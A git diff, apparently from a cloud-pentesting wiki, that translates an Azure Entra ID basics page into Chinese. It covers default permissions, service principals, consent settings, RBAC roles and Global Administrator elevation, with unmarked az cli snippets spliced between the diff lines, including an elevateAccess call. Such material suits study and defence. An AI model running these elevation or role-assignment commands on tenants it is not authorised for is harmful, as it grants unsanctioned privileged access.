on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments. 
+Entra 域服务通过提供**与传统 Windows Active Directory 环境兼容的托管域服务**扩展了 Entra ID 的功能。它支持 LDAP、Kerberos 和 NTLM 等遗留协议,允许组织在云中迁移或运行旧应用程序,而无需部署本地域控制器。此服务还支持组策略以进行集中管理,使其适合需要与现代云环境共存的遗留或基于 AD 的工作负载场景。 -## Entra ID Principals +## Entra ID 主体 -### Users +### 用户 -- **New users** - - Indicate email name and domain from selected tenant - - Indicate Display name - - Indicate password - - Indicate properties (first name, job title, contact info…) - - Default user type is “**member**” -- **External users** - - Indicate email to invite and display name (can be a non Microsft email) - - Indicate properties - - Default user type is “**Guest**” +- **新用户** +- 指定所选租户的电子邮件名称和域 +- 指定显示名称 +- 指定密码 +- 指定属性(名字、职位、联系信息等) +- 默认用户类型为“**成员**” +- **外部用户** +- 指定邀请的电子邮件和显示名称(可以是非微软电子邮件) +- 指定属性 +- 默认用户类型为“**访客**” -### Members & Guests Default Permissions +### 成员和访客默认权限 -You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to: +您可以在 [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) 中查看它们,但除了其他操作外,成员将能够: -- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties -- Invite Guests (_can be turned off_) -- Create Security groups -- Read non-hidden Group memberships -- Add guests to Owned groups -- Create new application (_can be turned off_) -- Add up to 50 devices to Azure (_can be turned off_) +- 读取所有用户、组、应用程序、设备、角色、订阅及其公共属性 +- 邀请访客(_可以关闭_) +- 创建安全组 +- 读取非隐藏的组成员资格 +- 将访客添加到拥有的组 +- 创建新应用程序(_可以关闭_) +- 将最多 50 个设备添加到 Azure(_可以关闭_) > [!NOTE] -> Remember that to enumerate Azure resources the user needs an explicit grant of the permission. +> 请记住,要枚举 Azure 资源,用户需要明确授予权限。 -### Users Default Configurable Permissions +### 用户默认可配置权限 -- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** - - Register Applications: Default **Yes** - - Restrict non-admin users from creating tenants: Default **No** - - Create security groups: Default **Yes** - - Restrict access to Microsoft Entra administration portal: Default **No** - - This doesn’t restrict API access to the portal (only web) - - Allow users to connect work or school account with LinkedIn: Default **Yes** - - Show keep user signed in: Default **Yes** - - Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings) - - Read other users: Default **Yes** (via Microsoft Graph) -- **Guests** - - **Guest user access restrictions** - - **Guest users have the same access as members** grants all member user permissions to guest users by default. - - **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed. - - **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one. 
- - **Guests can invite** - - **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default** - - **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions** - - **Only users assigned to specific admin roles can invite guest users** - - **No one in the organization can invite guest users including admins (most restrictive)** - - **External user leave**: Default **True** - - Allow external users to leave the organization +- **成员(**[**文档**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** +- 注册应用程序:默认**是** +- 限制非管理员用户创建租户:默认**否** +- 创建安全组:默认**是** +- 限制访问 Microsoft Entra 管理门户:默认**否** +- 这不会限制对门户的 API 访问(仅限网页) +- 允许用户将工作或学校帐户与 LinkedIn 连接:默认**是** +- 显示保持用户登录:默认**是** +- 限制用户恢复其拥有设备的 BitLocker 密钥:默认否(在设备设置中检查) +- 读取其他用户:默认**是**(通过 Microsoft Graph) +- **访客** +- **访客用户访问限制** +- **访客用户与成员**的访问权限相同,默认情况下将所有成员用户权限授予访客用户。 +- **访客用户对目录对象的属性和成员资格的访问有限(默认)**,默认情况下限制访客访问仅限于他们自己的用户配置文件。对其他用户和组信息的访问不再允许。 +- **访客用户访问限制在于他们自己目录对象的属性和成员资格**是最严格的。 +- **访客可以邀请** +- **组织中的任何人都可以邀请访客用户,包括访客和非管理员(最具包容性) - 默认** +- **成员用户和分配给特定管理员角色的用户可以邀请访客用户,包括具有成员权限的访客** +- **只有分配给特定管理员角色的用户可以邀请访客用户** +- **组织中的任何人都不能邀请访客用户,包括管理员(最严格)** +- **外部用户离开**:默认**为真** +- 允许外部用户离开组织 > [!TIP] -> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions. +> 即使默认受到限制,具有授予权限的用户(成员和访客)仍可以执行上述操作。 -### **Groups** +### **组** -There are **2 types of groups**: +有**2种类型的组**: -- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members. -- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users. - - This will have an **email address** with the domain of the EntraID tenant. +- **安全组**:此类型的组用于授予成员对应用程序、资源的访问权限并分配许可证。用户、设备、服务主体和其他组可以是成员。 +- **Microsoft 365 组**:此类型的组用于协作,给予成员对共享邮箱、日历、文件、SharePoint 站点等的访问权限。组成员只能是用户。 +- 这将具有一个**电子邮件地址**,其域为 EntraID 租户的域。 -There are **2 types of memberships**: +有**2种类型的成员资格**: -- **Assigned**: Allow to manually add specific members to a group. -- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change. +- **分配**:允许手动将特定成员添加到组。 +- **动态成员资格**:使用规则自动管理成员资格,当成员属性更改时更新组的包含。 -### **Service Principals** +### **服务主体** -A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity. +**服务主体**是为**与应用程序**、托管服务和自动化工具一起使用而创建的**身份**,以访问 Azure 资源。此访问权限由分配给服务主体的角色**限制**,使您能够控制**可以访问哪些资源**以及访问的级别。出于安全原因,始终建议**使用服务主体与自动化工具**,而不是允许它们使用用户身份登录。 -It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it. 
+可以通过生成**密钥**(密码)、**证书**或授予对第三方平台(例如 GitHub Actions)的**联合**访问权限来**直接以服务主体身份登录**。 -- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again. -- If you choose certificate authentication, make sure the **application will have access over the private key**. +- 如果选择**密码**身份验证(默认),请**保存生成的密码**,因为您将无法再次访问它。 +- 如果选择证书身份验证,请确保**应用程序将能够访问私钥**。 -### App Registrations +### 应用注册 -An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions. +**应用注册**是一个配置,允许应用程序与 Entra ID 集成并执行操作。 -#### Key Components: +#### 关键组件: -1. **Application ID (Client ID):** A unique identifier for your app in Azure AD. -2. **Redirect URIs:** URLs where Azure AD sends authentication responses. -3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions). - 1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID). -4. **API Permissions:** Specifies what resources or APIs the app can access. -5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect). -6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant. - 1. The **service principal** will get all the requested permissions it was configured with. +1. **应用程序 ID(客户端 ID):** Azure AD 中应用程序的唯一标识符。 +2. **重定向 URI:** Azure AD 发送身份验证响应的 URL。 +3. **证书、密钥和联合凭据:** 可以生成密钥或证书以作为应用程序的服务主体登录,或授予对其的联合访问权限(例如 GitHub Actions)。 +1. 如果生成了**证书**或**密钥**,则可以通过知道**应用程序 ID**、**密钥**或**证书**以及**租户**(域或 ID)来**以服务主体身份登录**。 +4. **API 权限:** 指定应用程序可以访问的资源或 API。 +5. **身份验证设置:** 定义应用程序支持的身份验证流程(例如 OAuth2、OpenID Connect)。 +6. **服务主体**:创建应用程序时会创建服务主体(如果是从 Web 控制台创建)或在新租户中安装时创建。 +1. **服务主体**将获得其配置的所有请求权限。 -### Default Consent Permissions +### 默认同意权限 -**User consent for applications** +**用户对应用程序的同意** -- **Do not allow user consent** - - An administrator will be required for all apps. -- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)** - - All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization. - - **Default** low impact permissions (although you need to accept to add them as low): - - User.Read - sign in and read user profile - - offline_access - maintain access to data that users have given it access to - - openid - sign users in - - profile - view user's basic profile - - email - view user's email address -- **Allow user consent for apps (Default)** - - All users can consent for any app to access the organization's data. 
+- **不允许用户同意** +- 所有应用程序都需要管理员。 +- **允许用户对来自经过验证的发布者的应用程序进行选择性权限的同意(推荐)** +- 所有用户可以对被分类为“低影响”的权限进行同意,适用于来自经过验证的发布者或在此组织中注册的应用程序。 +- **默认**低影响权限(尽管您需要接受将其添加为低影响): +- User.Read - 登录并读取用户配置文件 +- offline_access - 维护对用户已授予访问权限的数据的访问 +- openid - 登录用户 +- profile - 查看用户的基本资料 +- email - 查看用户的电子邮件地址 +- **允许用户对应用程序进行同意(默认)** +- 所有用户可以同意任何应用程序访问组织的数据。 -**Admin consent requests**: Default **No** +**管理员同意请求**:默认**否** -- Users can request admin consent to apps they are unable to consent to -- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests - - Configure also if users will receive email notifications and expiration reminders +- 用户可以请求管理员同意他们无法同意的应用程序 +- 如果**是**:可以指示可以同意请求的用户、组和角色 +- 还可以配置用户是否会收到电子邮件通知和到期提醒 -### **Managed Identity (Metadata)** +### **托管身份(元数据)** -Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure. +Azure Active Directory 中的托管身份提供了一种**自动管理应用程序身份**的解决方案。这些身份由应用程序用于**连接**到与 Azure Active Directory(**Azure AD**)身份验证兼容的**资源**。这允许**消除在代码中硬编码云凭据**的需要,因为应用程序将能够联系**元数据**服务以获取有效令牌,以**作为指定的托管身份执行操作**。 -There are two types of managed identities: +托管身份有两种类型: -- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you. -- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**. +- **系统分配**。某些 Azure 服务允许您**直接在服务实例上启用托管身份**。当您启用系统分配的托管身份时,会在资源所在的订阅中创建一个**服务主体**。当**资源**被**删除**时,Azure 会自动为您**删除**该**身份**。 +- **用户分配**。用户也可以生成托管身份。这些身份是在订阅内的资源组中创建的,并且将在 EntraID 中创建一个服务主体,受订阅信任。然后,您可以将托管身份分配给一个或**多个实例**的 Azure 服务(多个资源)。对于用户分配的托管身份,**身份与使用它的资源是分开管理的**。 -Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it. +托管身份**不会生成永久凭据**(如密码或证书)以访问与其关联的服务主体。 -### Enterprise Applications +### 企业应用程序 -It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to. +这只是一个**在 Azure 中过滤服务主体**并检查已分配应用程序的**表**。 -**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities. +**这不是另一种“应用程序”类型,** Azure 中没有任何对象是“企业应用程序”,这只是检查服务主体、应用注册和托管身份的抽象。 -### Administrative Units +### 管理单位 -Administrative units allows to **give permissions from a role over a specific portion of an organization**. 
+管理单位允许**从角色授予对组织特定部分的权限**。 -Example: +示例: -- Scenario: A company wants regional IT admins to manage only the users in their own region. -- Implementation: - - Create Administrative Units for each region (e.g., "North America AU", "Europe AU"). - - Populate AUs with users from their respective regions. - - AUs can **contain users, groups, or devices** - - AUs support **dynamic memberships** - - AUs **cannot contain AUs** - - Assign Admin Roles: - - Grant the "User Administrator" role to regional IT staff, scoped to their region's AU. -- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions. +- 场景:一家公司希望区域 IT 管理员仅管理自己区域的用户。 +- 实施: +- 为每个区域创建管理单位(例如,“北美 AU”、“欧洲 AU”)。 +- 用来自各自区域的用户填充 AU。 +- AU 可以**包含用户、组或设备** +- AU 支持**动态成员资格** +- AU **不能包含 AU** +- 分配管理员角色: +- 将“用户管理员”角色授予区域 IT 员工,范围限制在其区域的 AU。 +- 结果:区域 IT 管理员可以管理其区域内的用户帐户,而不影响其他区域。 -### Entra ID Roles +### Entra ID 角色 -- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID - - Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) -- The most privileged role is **Global Administrator** -- In the Description of the role it’s possible to see its **granular permissions** +- 为了管理 Entra ID,有一些**内置角色**可以分配给 Entra ID 主体以管理 Entra ID +- 在 [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) 中查看角色 +- 权限最高的角色是**全局管理员** +- 在角色描述中可以看到其**细粒度权限** -## Roles & Permissions +## 角色与权限 -**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)` +**角色**是**分配**给**主体**的**范围**:`principal -[HAS ROLE]->(scope)` -**Roles** assigned to **groups** are **inherited** by all the **members** of the group. +**分配给组的角色**会被组内的所有**成员**继承。 -Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group. +根据角色分配的范围,**角色**可能会**继承**到范围容器内的**其他资源**。例如,如果用户 A 在订阅上有一个**角色**,他将在订阅内的所有资源组和资源组内的**所有资源**上拥有该**角色**。 -### **Classic Roles** +### **经典角色** -| **Owner** |
• Full access to all resources<br>• Can manage access for other users | All resource types |
+| **所有者** | • 对所有资源的完全访问<br>• 可以管理其他用户的访问 | 所有资源类型 |
| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
-| **Contributor** | • Full access to all resources<br>• Cannot manage access | All resource types |
-| **Reader** | • View all resources | All resource types |
-| **User Access Administrator** | • View all resources<br>• Can manage access for other users | All resource types |
+| **贡献者** | • 对所有资源的完全访问<br>• 不能管理访问 | 所有资源类型 |
+| **读取者** | • 查看所有资源 | 所有资源类型 |
+| **用户访问管理员** | • 查看所有资源<br>• 可以管理其他用户的访问 |
| 所有资源类型 | -### Built-In roles +### 内置角色 -[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.** +[来自文档: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure 基于角色的访问控制(Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) 有几个 Azure **内置角色**,您可以将其**分配**给**用户、组、服务主体和托管身份**。角色分配是您控制**对 Azure 资源的访问**的方式。如果内置角色无法满足您组织的特定需求,您可以创建自己的 [**Azure 自定义角色**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**。** -**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources: +**内置**角色仅适用于**它们所针对的资源**,例如检查这两个**内置角色**在计算资源上的示例: -| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 | +| [磁盘备份读取者](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | 提供备份库执行磁盘备份的权限。 | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 | | ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ | -| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 | +| [虚拟机用户登录](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | 在门户中查看虚拟机并以常规用户身份登录。 | fb879df8-f326-4884-b1cf-06f3ad86be52 | -This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**. +这些角色也可以**分配给逻辑容器**(如管理组、订阅和资源组),受影响的主体将在**这些容器内的资源上**拥有它们。 -- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). -- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference). 
+- 在这里找到 [**所有 Azure 内置角色**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles) 的列表。 +- 在这里找到 [**所有 Entra ID 内置角色**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference) 的列表。 -### Custom Roles +### 自定义角色 -- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) -- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups) -- It’s possible to configure all the granular permissions the custom role will have -- It’s possible to exclude permissions - - A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere -- It’s possible to use wildcards -- The used format is a JSON - - `actions` are for control actions over the resource - - `dataActions` are permissions over the data within the object - -Example of permissions JSON for a custom role: +- 也可以创建 [**自定义角色**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) +- 它们是在一个范围内创建的,尽管一个角色可以在多个范围内(管理组、订阅和资源组) +- 可以配置自定义角色将拥有的所有细粒度权限 +- 可以排除权限 +- 拥有排除权限的主体即使在其他地方授予权限也无法使用该权限 +- 可以使用通配符 +- 使用的格式是 JSON +- `actions` 用于控制对资源的操作 +- `dataActions` 是对对象内数据的权限 +自定义角色的权限 JSON 示例: ```json { - "properties": { - "roleName": "", - "description": "", - "assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"], - "permissions": [ - { - "actions": [ - "Microsoft.DigitalTwins/register/action", - "Microsoft.DigitalTwins/unregister/action", - "Microsoft.DigitalTwins/operations/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/write", - "Microsoft.CostManagement/exports/*" - ], - "notActions": [ - "Astronomer.Astro/register/action", - "Astronomer.Astro/unregister/action", - "Astronomer.Astro/operations/read", - "Astronomer.Astro/organizations/read" - ], - "dataActions": [], - "notDataActions": [] - } - ] - } +"properties": { +"roleName": "", +"description": "", +"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"], +"permissions": [ +{ +"actions": [ +"Microsoft.DigitalTwins/register/action", +"Microsoft.DigitalTwins/unregister/action", +"Microsoft.DigitalTwins/operations/read", +"Microsoft.DigitalTwins/digitalTwinsInstances/read", +"Microsoft.DigitalTwins/digitalTwinsInstances/write", +"Microsoft.CostManagement/exports/*" +], +"notActions": [ +"Astronomer.Astro/register/action", +"Astronomer.Astro/unregister/action", +"Astronomer.Astro/operations/read", +"Astronomer.Astro/organizations/read" +], +"dataActions": [], +"notDataActions": [] +} +] +} } ``` +### 权限顺序 -### Permissions order - -- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**. -- An explicit **deny role assignment takes precedence** over the role granting the permission. +- 为了让一个 **主体对资源有某些访问权限**,他需要被授予一个明确的角色(以任何方式)**授予他该权限**。 +- 明确的 **拒绝角色分配优先于** 授予权限的角色。
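
To experiment with the custom role JSON shown above, an az cli sketch like the following is commonly used; `custom-role.json`, `MyCustomRole`, the principal object ID and the subscription ID are placeholders, and the JSON may need to be adapted to the flat layout that `az role definition create` expects:

```bash
# Register the custom role definition from a local JSON file
az role definition create --role-definition @custom-role.json

# Assign it to a principal at subscription scope
az role assignment create \
  --assignee "11111111-2222-3333-4444-555555555555" \
  --role "MyCustomRole" \
  --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"
```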

https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

-### Global Administrator +### 全局管理员 -Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default. +全局管理员是 Entra ID 的一个角色,授予 **对 Entra ID 租户的完全控制**。然而,默认情况下,它并不授予对 Azure 资源的任何权限。 -Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\ -This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties) +拥有全局管理员角色的用户可以在根管理组中 **“提升”到用户访问管理员 Azure 角色**。因此,全局管理员可以管理 **所有 Azure 订阅和管理组的访问**。\ +此提升可以在页面底部完成:[https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
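
Besides the portal toggle, the same elevation is exposed through the ARM API, so a hedged az cli sketch would be (it only succeeds while authenticated as a Global Administrator):

```bash
# Elevate access: grants the current Global Administrator "User Access Administrator" at the root scope "/"
az rest --method post --url "/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Check the resulting role assignment at root scope
az role assignment list --role "User Access Administrator" --scope "/"
```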
-### Azure Policies +### Azure 策略 -**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking. +**Azure 策略** 是帮助组织确保其资源符合特定标准和合规要求的规则。它们允许您 **强制执行或审核 Azure 中资源的设置**。例如,您可以防止在未经授权的区域创建虚拟机,或确保所有资源都有特定标签以便跟踪。 -Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources. +Azure 策略是 **主动的**:它们可以阻止不合规资源的创建或更改。它们也是 **反应性的**,允许您查找并修复现有的不合规资源。 -#### **Key Concepts** +#### **关键概念** -1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required. -2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group). -3. **Initiatives**: A collection of policies grouped together for broader enforcement. -4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append"). +1. **策略定义**:以 JSON 编写的规则,指定允许或要求的内容。 +2. **策略分配**:将策略应用于特定范围(例如,订阅、资源组)。 +3. **倡议**:一组政策的集合,用于更广泛的执行。 +4. **效果**:指定当策略被触发时会发生什么(例如,“拒绝”、“审核”或“附加”)。 -**Some examples:** +**一些示例:** -1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance. -2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments. -3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs. -4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources. -5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network. -6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption. +1. **确保符合特定 Azure 区域的合规性**:此策略确保所有资源在特定 Azure 区域中部署。例如,一家公司可能希望确保其所有数据存储在欧洲以符合 GDPR 合规性。 +2. **强制命名标准**:策略可以强制 Azure 资源的命名约定。这有助于根据名称组织和轻松识别资源,这在大型环境中非常有用。 +3. **限制某些资源类型**:此策略可以限制某些类型资源的创建。例如,可以设置策略以防止创建某些虚拟机大小等昂贵资源类型,以控制成本。 +4. **强制标签策略**:标签是与 Azure 资源关联的键值对,用于资源管理。策略可以强制要求所有资源必须存在某些标签,或具有特定值。这对于成本跟踪、所有权或资源分类非常有用。 +5. **限制对资源的公共访问**:策略可以强制某些资源(如存储帐户或数据库)没有公共端点,确保它们仅在组织的网络内可访问。 +6. **自动应用安全设置**:策略可以用于自动将安全设置应用于资源,例如将特定网络安全组应用于所有虚拟机或确保所有存储帐户使用加密。 -Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups. 
- -Azure policy json example: +请注意,Azure 策略可以附加到 Azure 层次结构的任何级别,但它们 **通常用于根管理组** 或其他管理组。 +Azure 策略 JSON 示例: ```json { - "policyRule": { - "if": { - "field": "location", - "notIn": ["eastus", "westus"] - }, - "then": { - "effect": "Deny" - } - }, - "parameters": {}, - "displayName": "Allow resources only in East US and West US", - "description": "This policy ensures that resources can only be created in East US or West US.", - "mode": "All" +"policyRule": { +"if": { +"field": "location", +"notIn": ["eastus", "westus"] +}, +"then": { +"effect": "Deny" +} +}, +"parameters": {}, +"displayName": "Allow resources only in East US and West US", +"description": "This policy ensures that resources can only be created in East US or West US.", +"mode": "All" } ``` +### 权限继承 -### Permissions Inheritance +在 Azure **权限可以分配给层级的任何部分**。这包括管理组、订阅、资源组和单个资源。权限由分配它们的实体的包含 **资源** 继承。 -In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned. - -This hierarchical structure allows for efficient and scalable management of access permissions. +这种层级结构允许高效和可扩展的访问权限管理。
-### Azure RBAC vs ABAC +### Azure RBAC 与 ABAC -**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\ -However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**. +**RBAC**(基于角色的访问控制)是我们在前面的部分中已经看到的:**将角色分配给主体以授予其对资源的访问权限**。\ +然而,在某些情况下,您可能希望提供 **更细粒度的访问管理** 或 **简化** **数百个** 角色 **分配** 的管理。 -Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\ -You **cannot** explicitly **deny** **access** to specific resources **using conditions**. +Azure **ABAC**(基于属性的访问控制)在 Azure RBAC 的基础上,通过在特定操作的上下文中添加 **基于属性的角色分配条件** 来构建。_角色分配条件_ 是您可以选择性地添加到角色分配中的 **额外检查**,以提供更细粒度的访问控制。条件过滤作为角色定义和角色分配一部分授予的权限。例如,您可以 **添加一个条件,要求对象具有特定标签才能读取该对象**。\ +您 **不能** 明确 **拒绝** **对特定资源的访问** **使用条件**。 -## References +## 参考文献 - [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) - [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions) @@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond - [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md index d076e723a..c88b11faa 100644 --- a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md @@ -4,98 +4,97 @@ ## Basic Information -Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources. +Entra ID 是微软基于云的身份和访问管理(IAM)平台,作为 Microsoft 365 和 Azure Resource Manager 等服务的基础认证和授权系统。Azure AD 